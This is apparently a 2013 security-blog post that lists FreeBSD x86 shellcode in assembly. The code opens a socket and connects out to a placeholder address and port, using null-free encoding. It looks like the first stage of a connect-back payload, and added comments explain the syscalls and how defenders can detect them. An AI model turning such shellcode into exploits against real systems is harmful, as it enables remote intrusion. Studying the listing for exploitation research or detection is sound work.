Research/Pwnable
[shellcode] FreeBSD x86 Socket/Connect
cheesechoi
2013. 8. 6. 15:45
# FreeBSD x86 (32-bit), GAS AT&T syntax: socket() followed by connect().
# The listing stops after connect(); neither syscall's result is checked.
# Calls go through int $0x80 with the syscall number in %eax and the
# arguments on the stack under one extra dword (presumably the slot a libc
# stub's return address would occupy; confirm against the FreeBSD i386
# syscall convention).
# 0xXXXXXXXX and 0xXXXX are the author's placeholders; the file does not
# assemble until they are filled in.
# NOTE(review): constants are built with xor/inc and 8-bit moves rather than
# 32-bit immediates, presumably to keep zero bytes out of the encoding.
# Whatever the encoding, the behaviour a defender observes is socket()
# followed by an outbound TCP connect() from the host process, which
# syscall auditing and egress filtering can see.
.globl main
main:
        # Initialization: clear the four registers used below.
        xor %eax, %eax
        xor %ebx, %ebx
        xor %ecx, %ecx
        xor %edx, %edx

        # socket(PF_INET, SOCK_STREAM, 0), i.e. socket(2, 1, 0).
        # Arguments are pushed last-to-first while %edx counts 0 -> 1 -> 2.
        push %edx                       # protocol = 0
        inc %edx
        push %edx                       # type = 1 (SOCK_STREAM)
        inc %edx
        push %edx                       # domain = 2 (PF_INET)
        mov $0x61, %al                  # syscall number 0x61 (97), socket per the comment above
        push %eax                       # extra dword above the arguments
        int $0x80                       # %eax is pushed below as the descriptor for connect()

        # sockaddr_in, built on the stack from the highest field down.
        # IP address, little endian.
        # NOTE(review): sin_addr and sin_port are read from memory in network
        # byte order, so "little endian" presumably means the immediate is
        # written byte-reversed on this little-endian CPU; confirm.
        push $0xXXXXXXXX
        # Port, little endian (same caveat as the address).
        pushw $0xXXXX
        # Stored as bytes AA 02: FreeBSD's sockaddr_in begins with a one-byte
        # sin_len followed by a one-byte sin_family, so sin_family = 2
        # (AF_INET) and sin_len = 0xAA. 0xAA is not the real length (16);
        # presumably a non-zero filler, TODO confirm.
        pushw $0x02AA
        mov %esp, %ebx                  # %ebx = address of the structure just built

        # connect(fd, { AF_INET XXX.XXX.XXX.XXX:XX }, 16)
        # The original comment writes the descriptor as 3; the code passes
        # whatever the first syscall left in %eax.
        mov $0x10, %cl                  # addrlen = 16; assumes the rest of %ecx is still zero
        push %ecx
        push %ebx                       # pointer to the sockaddr_in
        push %eax                       # descriptor returned by socket(), pushed unchecked
        mov $0x62, %al                  # syscall number 0x62 (98), connect; replaces only the low
                                        # byte, so it relies on the value in %eax being below 256
        push %eax                       # extra dword above the arguments
        int $0x80